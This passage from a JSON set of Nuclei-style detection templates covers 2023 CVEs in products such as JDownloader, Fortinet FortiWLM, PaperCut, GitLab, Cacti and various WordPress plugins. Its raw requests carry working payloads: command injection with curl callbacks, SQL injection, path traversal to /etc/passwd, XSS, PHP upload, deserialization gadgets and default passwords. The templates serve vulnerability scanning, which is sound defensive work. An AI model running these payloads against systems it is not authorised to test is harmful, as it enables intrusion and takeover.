(RCE)","severity":"critical"},"requests":[{"raw":["GET /flash/addcrypted2 HTTP/1.1\nHost: {{Hostname}}\n","POST /flash/addcrypted2 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\njk=pyimport+os%3Bos.system%28%22{{cmd}}%22%29%3Bf%3Dfunction+f2%28%29%7B%7D%3B&packages=YyVIbzmZ&crypted=ZbIlxWYe&passwords=oJFFUtTw\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_1","words":["JDownloader"]},{"type":"word","part":"interactsh_protocol","words":["dns"]}]}]},{"id":"CVE-2023-34993","info":{"name":"Fortinet FortiWLM Unauthenticated Command Injection Vulnerability","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/ems/cgi-bin/ezrf_upgrade_images.cgi?op_type=deleteprogressfile&progressfile={{url_encode(progressfile)}}"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: curl"]}]}]},{"id":"CVE-2023-0126","info":{"name":"SonicWall SMA1000 LFI","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/images//////////////////../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["content/unknown"]},{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-34259","info":{"name":"Kyocera TASKalfa printer - Path Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wlmdeu%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc/passwd%00index.htm"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0"]},{"type":"word","part":"server","words":["KM-MFP"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-30534","info":{"name":"Cacti < 1.2.25 Insecure Deserialization","severity":"medium"},"requests":[{"raw":["GET /index.php HTTP/1.1\nHost: {{Hostname}}\n","POST /index.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n__csrf_magic={{url_encode(csrf_token)}}&action=login&login_username={{username}}&login_password={{password}}\n","POST /managers.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=actions&action_receiver_notifications=1&selected_items=a%3A2%3A%7Bi%3A7%3Ba%3A1%3A%7Bi%3A0%3BO%3A18%3A%22phpseclib%5CNet%5CSSH1%22%3A2%3A%7Bs%3A6%3A%22bitmap%22%3Bi%3A1%3Bs%3A6%3A%22crypto%22%3BO%3A19%3A%22phpseclib%5CCrypt%5CAES%22%3A8%3A%7Bs%3A10%3A%22block_size%22%3BN%3Bs%3A12%3A%22inline_crypt%22%3Ba%3A2%3A%7Bi%3A0%3BO%3A25%3A%22phpseclib%5CCrypt%5CTripleDES%22%3A6%3A%7Bs%3A10%3A%22block_size%22%3Bs%3A30%3A%221%29%7B%7D%7D%7D%3B+ob_clean%28%29%3Blsdie%28%29%3B+%3F%3E%22%3Bs%3A12%3A%22inline_crypt%22%3BN%3Bs%3A16%3A%22use_inline_crypt%22%3Bi%3A1%3Bs%3A7%3A%22changed%22%3Bi%3A0%3Bs%3A6%3A%22engine%22%3Bi%3A1%3Bs%3A4%3A%22mode%22%3Bi%3A1%3B%7Di%3A1%3Bs%3A26%3A%22_createInlineCryptFunction%22%3B%7Ds%3A16%3A%22use_inline_crypt%22%3Bi%3A1%3Bs%3A7%3A%22changed%22%3Bi%3A0%3Bs%3A6%3A%22engine%22%3Bi%3A1%3Bs%3A4%3A%22mode%22%3Bi%3A1%3Bs%3A6%3A%22bitmap%22%3Bi%3A1%3Bs%3A6%3A%22crypto%22%3Bi%3A1%3B%7D%7D%7Di%3A7%3Bi%3A7%3B%7D&drp_action=2&__csrf_magic={{url_encode(csrf_token)}}\n","GET /clog.php HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"regex","part":"body_4","regex":["<table[^;]*;['\"]>\\s*(<tr class=['\"]clogError['\"]>[\\s\\S]*unserialize[\\s\\S]*managers.php[\\s\\S]*[Aa]uthenticated)"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"csrf_token","part":"body","group":1,"regex":["var csrfMagicToken = ['\"]([a-z0-9,:;]*)['\"]"],"internal":true}]}]},{"id":"CVE-2023-23161","info":{"name":"Art Gallery Management System Project v1.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/product.php?cid=1&&artname=%3Cimg%20src=1%20onerror=alert(document.domain)%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["center\"><img src=1 onerror=alert(document.domain)>","Art Type"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-6114","info":{"name":"Duplicator < 1.5.7.1; Duplicator Pro < 4.5.14.2 - Unauthenticated Sensitive Data Exposure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/backups-dup-lite/tmp/","{{BaseURL}}/wp-content/backups-dup-pro/tmp/"],"stop-at-first-match":true,"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(body, '/tmp') && contains(body, '<title>Index of')"],"condition":"and"}]}]},{"id":"CVE-2023-43326","info":{"name":"MooSocial 3.1.8 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/users/change_emailahrixia%22%3e%3cimg%20src%3da%20onerror%3dalert(document.domain)%3eahrixia?step1=1"],"matchers":[{"type":"dsl","dsl":["status_code == 404","contains(content_type, \"text/html\")","contains_all(body, \"<img src=a onerror=alert(document.domain)>\", \"mooSocial\")"],"condition":"and"}]}]},{"id":"CVE-2023-22480","info":{"name":"KubeOperator Foreground `kubeconfig` - File Download","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/v1/clusters/kubeconfig/k8s"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["apiVersion:","clusters:"],"condition":"and"},{"type":"word","part":"header","words":["application/download"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-3578","info":{"name":"DedeCMS 5.7.109 - Server-Side Request Forgery","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"max-redirects":2,"matchers":[{"type":"word","part":"response","words":["DedeCms"],"case-insensitive":true}]},{"raw":["GET /co_do.php?rssurl=https://{{interactsh-url}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["dns","http"]}]}]},{"id":"CVE-2023-1408","info":{"name":"Video List Manager <= 1.7 - SQL Injection","severity":"high"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","@timeout: 15s\nGET /wp-admin/admin.php?page=tnt_video_edit_page&videoID=SLEEP(7) HTTP/1.1\nHost: {{Hostname}}\n"],"redirects":true,"matchers":[{"type":"dsl","dsl":["duration_2>=7","status_code_2 == 200","contains_all(body_2, \"Edit Video\",\"Youtube</option>\")"],"condition":"and"}]}]},{"id":"CVE-2023-20888","info":{"name":"VMware Aria Operations for Networks - Remote Code Execution","severity":"high"},"requests":[{"raw":["POST /api/auth/login HTTP/2\nHost: {{Hostname}}\nContent-Type: application/json;charset=UTF-8\nX-Vrni-Csrf-Token: null\n\n{\"username\":\"{{username}}\",\"password\":\"{{password}}\",\"domain\":\"localdomain\"}\n","POST /api/events/push-notifications HTTP/2\nHost: {{Hostname}}\nX-Vrni-Csrf-Token: {{csrf}}\nContent-Type: application/json\n\n{\"endOffset\": \"{{ generate_java_gadget(\"dns\", \"http://{{interactsh-url}}\", \"base64\") }} \"}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"status","status":[500]}],"extractors":[{"type":"regex","name":"csrf","group":1,"regex":["csrfToken\":\"([a-z0-9A-Z/+=]+)\""],"internal":true,"part":"body"}]}]},{"id":"CVE-2023-1730","info":{"name":"SupportCandy < 3.1.5 - Unauthenticated SQL Injection","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\nCookie: wpsc_guest_login_auth={\"email\":\"' AND (SELECT 42 FROM (SELECT(SLEEP(6)))NNTu)-- cLmu\"}\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(body, \"supportcandy\")"],"condition":"and"}]}]},{"id":"CVE-2023-39650","info":{"name":"PrestaShop Theme Volty CMS Blog - SQL Injection","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains_any(tolower(response), \"prestashop\", \"tvcmsblog\")"],"internal":true}]},{"raw":["@timeout: 20s\nGET /module/tvcmsblog/single?SubmitCurrency=1&id=14&id_currency=2&page_type=post\"+AND+(SELECT+7826+FROM+(SELECT(SLEEP(8)))oqFL)--+yxoW HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\n","@timeout: 20s\nGET /module/tvcmsblog/single?SubmitCurrency=1&id=14&id_currency=2&page_type=post\"+AND+5484=5484--+xhCs HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\n","@timeout: 20s\nGET /module/tvcmsblog/single?SubmitCurrency=1&id=14&id_currency=2&page_type=post\"+AND+5484=5485--+xhCs HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\n"],"host-redirects":true,"matchers":[{"type":"dsl","name":"time-based","dsl":["duration_1>=8","status_code_1 == 200 && contains(body_1, \"tvcmsblog\")"],"condition":"and"},{"type":"dsl","name":"blind-based","dsl":["status_code_2 == 200 && contains(body_2, \"tvcmsblog\")","status_code_2 == 200 && status_code_3 == 302"],"condition":"and"}]}]},{"id":"CVE-2023-2059","info":{"name":"DedeCMS 5.7.87 - Directory Traversal","severity":"medium"},"requests":[{"raw":["GET /include/dialog/select_templets.php?f=form1.templetactivepath=%2ftemplets/../..\\..\\..\\ HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["dirname(__FILE__)","$cfg_basedir","dedecms"],"condition":"and","case-insensitive":true},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-31446","info":{"name":"Cassia Gateway Firmware - Remote Code Execution","severity":"critical"},"requests":[{"raw":["@timeout: 20s\nGET /bypass/config?type=sqs&keyId=test&key=security&queueUrl=http://{{interactsh-url}}/ HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"regex","regex":["^OK$"]}]}]},{"id":"CVE-2023-4168","info":{"name":"Adlisting Classified Ads 2.14.0 - Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/ad-list-search?keyword=&lat=&long=&long=&lat=&location=&category=&keyword="],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(content_type, \"text/html\")","contains_all(body, \"google_map_key\", \"api_key\", \"auth_domain\")"],"condition":"and"}]}]},{"id":"CVE-2023-35158","info":{"name":"XWiki - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/xwiki/bin/view/XWiki/Main?xpage=restore&showBatch=true&xredirect=javascript:alert(document.domain)"],"matchers":[{"type":"dsl","dsl":["contains(body, \"href=\\\"javascript:alert(document.domain)\\\">Cancel</a>\")","contains(header, \"text/html\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2023-52251","info":{"name":"Kafka UI 0.7.1 Command Injection","severity":"high"},"requests":[{"raw":["GET /api/clusters HTTP/1.1\nHost: {{Hostname}}\n"],"extractors":[{"type":"json","name":"cluster-name","internal":true,"json":[".[0].name"]}]},{"raw":["GET /api/clusters/{{cluster-name}}/topics?page=1&perPage=25&showInternal=true HTTP/1.1\nHost: {{Hostname}}\n"],"extractors":[{"type":"json","name":"topic-name","internal":true,"json":[".topics[].name"]}]},{"raw":["@timeout 20s\nGET /api/clusters/{{cluster-name}}/topics/{{topic-name}}/messages?q=new+ProcessBuilder%28%22curl%22%2C%22{{interactsh-url}}%22%29.start%28%29&filterQueryType=GROOVY_SCRIPT&attempt=7&limit=100&page=0&seekDirection=FORWARD&keySerde=String&valueSerde=String&seekType=BEGINNING HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"body","words":["Assigning partitions"]}]}]},{"id":"CVE-2023-1835","info":{"name":"Ninja Forms < 3.6.22 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=nf-processing&title=%253Csvg%252Fonload%253Dalert%2528document.domain%2529%253E  HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(content_type_2, \"text/html\")","contains(body_2, \"<svg/onload=alert(document.domain)>\")","contains(body_2, \"Ninja Forms\")"],"condition":"and"}]}]},{"id":"CVE-2023-40751","info":{"name":"PHPJabbers Fundraising Script v1.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"POST","path":["{{BaseURL}}/index.php?controller=pjAdmin&action=%3Cimg+src%3Dx+onerror%3Dprompt%28document.domain%29%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src=x onerror=prompt(document.domain)>","didn't exists"],"condition":"and"},{"type":"word","part":"content_type","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-3380","info":{"name":"WAVLINK WN579X3 - Remote Command Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}"],"matchers":[{"type":"word","words":["images/WAVLINK-logo.png","<title>Wi-Fi APP Login</title>"],"condition":"and","internal":true}]},{"raw":["POST /cgi-bin/adm.cgi HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nReferer: {{RootURL}}/ping.shtml\n\npage=ping_test&CCMD=4&pingIp=255.255.255.255%3Bcurl+http%3A%2F%2F{{interactsh-url}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-7028","info":{"name":"GitLab - Account Takeover via Password Reset","severity":"high"},"requests":[{"raw":["GET /users/sign_in HTTP/1.1\nHost: {{Hostname}}\n"],"extractors":[{"type":"regex","name":"token","group":1,"regex":["name=\"authenticity_token\" value=\"([A-Za-z0-9_-]+)\""],"internal":true}]},{"raw":["@timeout: 20s\nPOST /users/password HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nReferer: {{RootURL}}/users/password/new\n\nauthenticity_token={{token}}&user[email][]={{username}}&user[email][]={{rand_base(6)}}@{{interactsh-url}}\n"],"payloads":{"username":["admin@example.com","admin@{{RDN}}","root@{{RDN}}","gitlab@{{RDN}}","git@{{RDN}}"]},"matchers":[{"type":"dsl","dsl":["contains(interactsh_protocol, 'smtp')"]}],"extractors":[{"type":"dsl","dsl":["username"]}]}]},{"id":"CVE-2023-34659","info":{"name":"JeecgBoot 3.5.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /jeecg-boot/jmreport/show HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json;charset=UTF-8\n\n{\"id\":\"961455b47c0b86dc961e90b5893bff05\",\"apiUrl\":\"\",\"params\":\"{\"id\":\"1' or '%1%' like (updatexml(0x3a,concat(1,(version())),1)) or '%%' like '\"}\"}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["XPATH syntax error:","SQLException"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-29084","info":{"name":"ManageEngine ADManager Plus - Command Injection","severity":"high"},"requests":[{"raw":["POST /j_security_check HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\nReferer: {{BaseURL}}\nContent-Type: application/x-www-form-urlencoded\n\nis_admp_pass_encrypted=false&j_username={{username}}&j_password={{password}}&domainName=ADManager+Plus+Authentication&AUTHRULE_NAME=ADAuthenticator\n","GET /home.do HTTP/1.1\nHost: {{Hostname}}\n","POST /api/json/admin/saveServerSettings HTTP/1.1\nHost: {{Hostname}}\nX-Requested-With: XMLHttpRequest\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nOrigin: {{BaseURL}}\nReferer: {{BaseURL}}\n\nparams=[{\"tabId\":\"proxy\",\"ENABLE_PROXY\":true,\"SERVER_NAME\":\"1.1.1.1\",\"USER_NAME\":\"random\",\"PASSWORD\":\"asd\\r\\n{{cmd}}\",\"PORT\":\"80\"}]&admpcsrf={{admpcsrf}}\n"],"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{\"message\":\"","Proxy Settings"],"condition":"and"},{"type":"word","part":"interactsh_protocol","words":["dns"]}],"extractors":[{"type":"kval","name":"admpcsrf","internal":true,"kval":["admpcsrf"],"part":"header"}]}]},{"id":"CVE-2023-38964","info":{"name":"Academy LMS 6.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/home/courses?query=\"><svg+onload=alert(document.domain)>"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["status_code == 200","contains(header, \"text/html\")","contains_all(body, \"<svg onload=alert(document.domain)>\", \"All courses</span>\")"],"condition":"and"}]}]},{"id":"CVE-2023-37629","info":{"name":"Online Piggery Management System v1.0 - Unauthenticated File Upload","severity":"critical"},"requests":[{"raw":["POST /pig/add-pig.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=---------------------------WebKitFormBoundary20kgW2hEKYaeF5iP\n\n-----------------------------WebKitFormBoundary20kgW2hEKYaeF5iP\nContent-Disposition: form-data; name=\"pigno\"\n\npig-fms-100\n-----------------------------WebKitFormBoundary20kgW2hEKYaeF5iP\nContent-Disposition: form-data; name=\"weight\"\n\n65465\n-----------------------------WebKitFormBoundary20kgW2hEKYaeF5iP\nContent-Disposition: form-data; name=\"arrived\"\n\n{{date_time(\"%Y-%M-%D\")}}\n-----------------------------WebKitFormBoundary20kgW2hEKYaeF5iP\nContent-Disposition: form-data; name=\"gender\"\n\nfemale\n-----------------------------WebKitFormBoundary20kgW2hEKYaeF5iP\nContent-Disposition: form-data; name=\"status\"\n\nactive\n-----------------------------WebKitFormBoundary20kgW2hEKYaeF5iP\nContent-Disposition: form-data; name=\"breed\"\n\n2\n-----------------------------WebKitFormBoundary20kgW2hEKYaeF5iP\nContent-Disposition: form-data; name=\"remark\"\n\n4fwefwe\n-----------------------------WebKitFormBoundary20kgW2hEKYaeF5iP\nContent-Disposition: form-data; name=\"pigphoto\"; filename=\"{{rand_base(5)}}\".php\"\nContent-Type: application/x-php\n\n<?php echo md5(\"{{string}}\");unlink(__FILE__);?>\n\n-----------------------------WebKitFormBoundary20kgW2hEKYaeF5iP\nContent-Disposition: form-data; name=\"submit\"\n\n\n-----------------------------WebKitFormBoundary20kgW2hEKYaeF5iP--\n"],"matchers":[{"type":"dsl","dsl":["status_code == 302","contains(content_type, \"text/html\")","contains(body, \"successfully created\")"],"condition":"and"}]}]},{"id":"CVE-2023-5222","info":{"name":"Viessmann Vitogate 300 - Hardcoded Password","severity":"critical"},"requests":[{"raw":["POST /cgi-bin/vitogate.cgi HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"method\":\"put\",\"form\":\"form-login\",\"params\":{\"uid\":\"{{username}}\",\"pwd\":\"{{password}}\"}}\n"],"attack":"pitchfork","payloads":{"username":["vitomaster","vitogate"],"password":["viessmann1917","viessmann"]},"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["admin\":true","\"sessionId\":"],"condition":"and"},{"type":"word","part":"content_type","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-0630","info":{"name":"Slimstat Analytics < 4.9.3.3 Subscriber - SQL Injection","severity":"high"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","@timeout: 20s\nPOST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=parse-media-shortcode&shortcode=[slimstat f=\"count\" w=\"author\"]WHERE:1 UNION SELECT sleep(7)-- a[/slimstat]\n"],"matchers":[{"type":"dsl","dsl":["duration_2>=7","status_code_2 == 200","contains(content_type_2, \"application/json\")","contains(body_2, \"audioShortcodeLibrary\")"],"condition":"and"}]}]},{"id":"CVE-2023-40779","info":{"name":"IceWarp Mail Server Deep Castle 2 v.13.0.1.2 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/%5coast.pro/%2f%2e%2e"],"matchers-condition":"and","matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_\\.@]*)oast\\.pro.*$"]},{"type":"status","status":[302]}]}]},{"id":"CVE-2023-33439","info":{"name":"Faculty Evaluation System v1.0 - SQL Injection","severity":"high"},"requests":[{"raw":["POST /ajax.php?action=login HTTP/1.1\nHost:{{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nemail={{username}}&password={{password}}&login=1\n","GET /admin/manage_task.php?id=1%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),0)--+ HTTP/1.1\nHost:{{Hostname}}\n"],"redirects":true,"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(body, \"Fatal error:\")","contains(body, \"XPATH syntax error:\")"],"condition":"and"}]}]},{"id":"CVE-2023-34537","info":{"name":"Hoteldruid 3.0.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /inizio.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nvers_hinc=1&nome_utente_phpr={{username}}&password_phpr={{password}}\n","POST /creaprezzi.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nanno=2023&id_sessione=&tipotariffa=a19yc%22%3e%3cscript%3ealert(document.domain)%3c%2fscript%3emjf9oc2183m&inizioperiodosett1=2023-12-24&fineperiodosett1=2023-12-31&tipo_prezzo=sett&prezzosett=&prezzosettp=&prezzoperiodo1=&prezzoperiodo1p=&prezzoperiodo2=&prezzoperiodo2p=&prezzoperiodo3=&prezzoperiodo3p=&prezzoperiodo4=&prezzoperiodo4p=&prezzoperiodo5=&prezzoperiodo5p=&prezzoperiodo6=&prezzoperiodo6p=&prezzoperiodo7=&prezzoperiodo7p=&inserisci_settimanalmente=1\n"],"skip-variables-check":true,"redirects":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(content_type_2, \"text/html\")","contains(body_2, \"<script>alert(document.domain)</script>\")","contains(body_2, \"HotelDruid\")"],"condition":"and"}]}]},{"id":"CVE-2023-27350","info":{"name":"PaperCut - Unauthenticated Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /app?service=page/SetupCompleted HTTP/1.1\nHost: {{Hostname}}\n","POST /app HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\nContent-Type: application/x-www-form-urlencoded\n\nservice=direct%2F1%2FSetupCompleted%2F%24Form&sp=S0&Form0=%24Hidden%2CanalyticsEnabled%2C%24Submit&%24Hidden=true&%24Submit=Login\n","POST /app HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\nContent-Type: application/x-www-form-urlencoded\n\nservice=direct%2F1%2FConfigEditor%2FquickFindForm&sp=S0&Form0=%24TextField%2CdoQuickFind%2Cclear&%24TextField=print-and-device.script.enabled&doQuickFind=Go\n","POST /app HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\nContent-Type: application/x-www-form-urlencoded\n\nservice=direct%2F1%2FConfigEditor%2F%24Form&sp=S1&Form1=%24TextField%240%2C%24Submit%2C%24Submit%240&%24TextField%240=Y&%24Submit=Update\n","POST /app HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\nContent-Type: application/x-www-form-urlencoded\n\nservice=direct%2F1%2FConfigEditor%2FquickFindForm&sp=S0&Form0=%24TextField%2CdoQuickFind%2Cclear&%24TextField=print.script.sandboxed&doQuickFind=Go\n","POST /app HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\nContent-Type: application/x-www-form-urlencoded\n\nservice=direct%2F1%2FConfigEditor%2F%24Form&sp=S1&Form1=%24TextField%240%2C%24Submit%2C%24Submit%240&%24TextField%240=N&%24Submit=Update\n","GET /app?service=page/PrinterList HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\nContent-Type: application/x-www-form-urlencoded\n\nservice=page%2FPrinterList\n","POST /app?service=direct/1/PrinterList/selectPrinter&sp={{printerID}} HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\nContent-Type: application/x-www-form-urlencoded\n\nservice=direct%2F1%2FPrinterList%2FselectPrinter&sp={{printerID}}\n","POST /app HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\nContent-Type: application/x-www-form-urlencoded\n\nservice=direct%2F1%2FPrinterDetails%2FprinterOptionsTab.tab&sp=4\n","POST /app HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\nContent-Type: application/x-www-form-urlencoded\n\nservice=direct%2F1%2FPrinterDetails%2F%24PrinterDetailsScript.%24Form&sp=S0&Form0=printerId%2CenablePrintScript%2CscriptBody%2C%24Submit%2C%24Submit%240%2C%24Submit%241&printerId={{printerID}}&enablePrintScript=on&scriptBody=function+printJobHook%28inputs%2C+actions%29+%7B%7D%0D%0Ajava.lang.Runtime.getRuntime%28%29.exec%28%27{{cmd}}%27%29%3B&%24Submit%241=Apply\n"],"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body","words":["Avanceret kontering"]}],"extractors":[{"type":"regex","name":"printerID","group":1,"regex":["erList\\/selectPrinterCost&amp;sp=([a-z0-9]+)\">"],"internal":true,"part":"body"}]}]},{"id":"CVE-2023-2479","info":{"name":"Appium Desktop Server - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/?url=<img/src=\"http://{{interactsh-url}}\">"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["The requested resource could not be found, or a request was received using an HTTP method that is not supported by the mapped resource"]},{"type":"word","part":"header","words":["application/json"]},{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"status","status":[404]}]}]},{"id":"CVE-2023-40753","info":{"name":"PHPJabbers Ticket Support Script v3.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /index.php?controller=pjBase&action=pjActionLogin HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlogin_user=1&login_email={{username}}&login_password={{password}}&login_captcha=\n","GET /notification_create=1&type=NewTicket&department_id%5B%5D=2&user_id%5B%5D=1&i18n%5B1%5D%5Bsubject%5D=a&i18n%5B1%5D%5Bmessage%5D=%3C%2Ftextarea%3E%3CscrIpt%3Ealert(document.domain)%3B%3C%2FscRipt%3E%3Ctextarea%3E HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["</textarea><scrIpt>alert(document.domain);</scRipt><textarea>","Subject","Recipient users"],"condition":"and"},{"type":"word","part":"content_type_2","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-1315","info":{"name":"osTicket < v1.16.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /scp/login.php HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(tolower(body), \"osticket\")"],"internal":true}],"extractors":[{"type":"regex","name":"csrftoken","part":"body","group":1,"regex":["__CSRFToken__\" value=\"(.*?)\""],"internal":true}]},{"raw":["POST /scp/login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n__CSRFToken__={{csrftoken}}&do=scplogin&userid={{username}}&passwd={{password}}&ajax=1\n","GET /{{path}} HTTP/1.1\nHost: {{Hostname}}\n"],"payloads":{"path":["scp/ajax.php/tickets/search?parent_id=1\"><svg/x=\">\"/onload=confirm()//","scp/ajax.php/tickets/search/create?pid=adhoc%2cpdXBTnfSg0riebm%22%3e%3cscript%3ealert(document.domain)%3c%2fscript%3etgghb"]},"stop-at-first-match":true,"matchers":[{"type":"dsl","dsl":["contains_any(body, \"><svg/x=\\\">\\\"/onload=confirm()//\", \"\\\"><script>alert(document.domain)</script>\")","contains(header, \"text/html\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2023-3849","info":{"name":"mooDating 1.2 - Cross-site scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/find-a-matchpksyk\"><img%20src%3da%20onerror%3dalert(document.cookie)>s9a64?"],"matchers":[{"type":"dsl","dsl":["status_code == 404","contains(content_type, \"text/html\")","contains(body, 